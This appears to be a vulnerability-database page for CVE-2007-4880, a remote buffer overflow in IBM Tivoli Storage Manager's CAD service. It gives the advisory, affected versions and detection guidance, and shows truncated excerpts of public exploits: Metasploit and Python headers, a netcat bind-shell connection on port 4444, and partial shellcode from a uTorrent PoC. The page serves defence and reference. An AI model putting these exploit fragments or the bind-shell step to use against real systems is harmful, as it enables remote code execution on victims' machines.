CVE-2007-4880
published 2007-09-28CVE-2007-4880: Buffer overflow in the Client Acceptor Daemon (CAD), dsmcad.exe, in certain IBM Tivoli Storage Manager (TSM) clients 5.1 before 5.1.8.1, 5.2 before 5.2.5.2…
PriorityP270critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
75.94%
99.5th percentile
Buffer overflow in the Client Acceptor Daemon (CAD), dsmcad.exe, in certain IBM Tivoli Storage Manager (TSM) clients 5.1 before 5.1.8.1, 5.2 before 5.2.5.2, 5.3 before 5.3.5.3, and 5.4 before 5.4.1.2 allows remote attackers to execute arbitrary code via crafted HTTP headers, aka IC52905.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | tivoli_storage_manager_client | — | — |
| ibm | tivoli_storage_manager_client | — | — |
| ibm | tivoli_storage_manager_client | — | — |
| ibm | tivoli_storage_manager_client | — | — |
| ibm | tivoli_storage_manager_client | — | — |
| ibm | tivoli_storage_manager_client | — | — |
| ibm | tivoli_storage_manager_client | — | — |
| ibm | tivoli_storage_manager_client | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x38\x07\xD2\x77
- →Detect exploit attempts by monitoring for oversized HTTP Host headers in requests to TCP port 1581 targeting the /BACLIENT URI path, which is the attack vector for this CAD service buffer overflow. ↗
- →Alert on GET requests to /BACLIENT on port 1581 where the Host header value exceeds ~190 bytes, consistent with the overflow trigger. ↗
- →Monitor for unexpected outbound bind-shell connections on port 4444 from the dsmcad.exe process following inbound connections on port 1581. ↗
- →The payload uses bad characters \x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c; network signatures should look for long alpha-encoded shellcode blobs in the Host header of HTTP requests to port 1581. ↗
- →The exploit uses EXITFUNC=seh, so look for SEH-chain overwrites in crash dumps or exception handler telemetry from dsmcad.exe. ↗
- ·The JMP ESP ROP gadget address (0x77D20738 in User32.dll) is specific to Windows 2000 SP0 EN; the Metasploit module uses a different return address (0x0289fbe3 in dbghelp.dll) targeting TSM Express 5.3.3 on Windows 2003 Server SP0. Signatures relying on these hardcoded addresses will not generalise across OS/patch levels. ↗
- ·Vulnerable versions are TSM clients 5.1 before 5.1.8.1, 5.2 before 5.2.5.2, 5.3 before 5.3.5.3, and 5.4 before 5.4.1.2; detection rules should be scoped to hosts running these specific version ranges. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IBM Tivoli Storage Manager Express CAD Service - Remote Buffer Overflow (Metasploit) (2)
exploitdb·2010-05-09
CVE-2007-4880 IBM Tivoli Storage Manager Express CAD Service - Remote Buffer Overflow (Metasploit) (2)
IBM Tivoli Storage Manager Express CAD Service - Remote Buffer Overflow (Metasploit) (2)
---
##
# $Id: ibm_tsm_cad_header.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).
By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LI
Exploit-DB
IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
exploitdb·2007-10-27
CVE-2007-4880 IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
---
#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.
Exploit-DB
μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow
exploitdb·2007-02-12
CVE-2007-0927 μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow
μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow
---
/*
* This is a PoC remote exploit for uTorrent 1.6
*
* Author:
* defsec
* http://www.defacedsecurity.com
*
*
* Works on XP SP1 and w2k sp1-4
*
*/
#include
#include
#define NASIZE 4880
unsigned char nice_announce[NASIZE];
unsigned char xorops[]="\x33\xc0\x33\xdb";
// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
unsigned char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x
Metasploit
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
metasploit
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
No writeups or analysis indexed.
http://osvdb.org/38161http://secunia.com/advisories/26883http://securityreason.com/securityalert/3184http://www-1.ibm.com/support/docview.wss?uid=swg21268775http://www-1.ibm.com/support/search.wss?rs=0&q=IC52905&apar=onlyhttp://www.securityfocus.com/archive/1/480492http://www.securityfocus.com/bid/25743http://www.securitytracker.com/id?1018725http://www.vupen.com/english/advisories/2007/3228http://www.zerodayinitiative.com/advisories/ZDI-07-054.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/36700http://osvdb.org/38161http://secunia.com/advisories/26883http://securityreason.com/securityalert/3184http://www-1.ibm.com/support/docview.wss?uid=swg21268775http://www-1.ibm.com/support/search.wss?rs=0&q=IC52905&apar=onlyhttp://www.securityfocus.com/archive/1/480492http://www.securityfocus.com/bid/25743http://www.securitytracker.com/id?1018725http://www.vupen.com/english/advisories/2007/3228http://www.zerodayinitiative.com/advisories/ZDI-07-054.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/36700
2007-09-28
Published